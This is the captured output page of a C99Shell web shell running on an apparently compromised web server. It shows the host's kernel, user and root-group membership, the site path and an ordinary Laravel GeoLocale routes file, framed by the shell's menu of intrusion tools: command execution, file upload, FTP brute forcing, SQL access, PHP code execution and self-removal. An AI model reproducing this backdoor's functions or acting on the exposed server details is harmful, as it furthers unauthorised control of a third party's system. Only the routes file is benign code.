!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/ecom1.picotech.app/public_html_ecom1/Modules/GeoLocale/Routes/   drwxr-xr-x
Free 26.99 GB of 117.98 GB (22.88%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     web.php (2.89 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

/*
|--------------------------------------------------------------------------
| Web Routes
|--------------------------------------------------------------------------
|
| Here is where you can register web routes for your application. These
| routes are loaded by the RouteServiceProvider within a group which
| contains the "web" middleware group. Now create something great!
|
*/

Route::group(['namespace' => 'Modules\GeoLocale\Http\Controllers''middleware' => ['locale']], function () {

    
Route::group(['prefix' => 'admin'], function () {
        
// GeoLocale
        
Route::get('geolocale''GeoLocaleController@index')->name('geolocale.index');

        
// Country
        
Route::get('/countries''CountryController@index');
        
Route::get('/countries/{ciso}''CountryController@show');
        
Route::post('/country/store''CountryController@store')->middleware(['checkForDemoMode'])->name('country.store');
        
Route::post('/country/update/{id}''CountryController@update')->middleware(['checkForDemoMode'])->name('country.update');
        
Route::post('/country/delete/{id}''CountryController@destroy')->middleware(['checkForDemoMode'])->name('country.delete');

        
Route::get('/country-search/{keyword}''CountryController@search');

        
// State
        
Route::get('/states''StateController@index');
        
Route::get('/countries/{ciso}/states/{siso}''StateController@show');
        
Route::get('/countries/{ciso}/states''StateController@getCountryStates');
        
Route::post('/state/store''StateController@store')->middleware(['checkForDemoMode'])->name('state.store');
        
Route::post('/state/update/{id}''StateController@update')->middleware(['checkForDemoMode'])->name('state.update');
        
Route::post('/state/delete/{id}''StateController@destroy')->middleware(['checkForDemoMode'])->name('state.delete');

        
Route::get('/state-search/{stateKeyword}/{countryCode?}''StateController@search');

        
// City
        
Route::get('/countries/{ciso}/cities''CityController@getCountryCities');
        
Route::get('/countries/{ciso}/states/{siso}/cities''CityController@getStateCities');
        
Route::post('/city/store''CityController@store')->middleware(['checkForDemoMode'])->name('city.store');
        
Route::post('/city/update/{id}''CityController@update')->middleware(['checkForDemoMode'])->name('city.update');
        
Route::post('/city/delete/{id}''CityController@destroy')->middleware(['checkForDemoMode'])->name('city.delete');
    });

    
Route::group(['prefix' => 'geo-locale'], function () {
        
// Country
        
Route::get('/countries''CountryController@index');

        
// State
        
Route::get('/countries/{ciso}/states''StateController@getCountryStates');

        
// City
        
Route::get('/countries/{ciso}/states/{siso}/cities''CityController@getStateCities');

    });
});


:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0041 ]--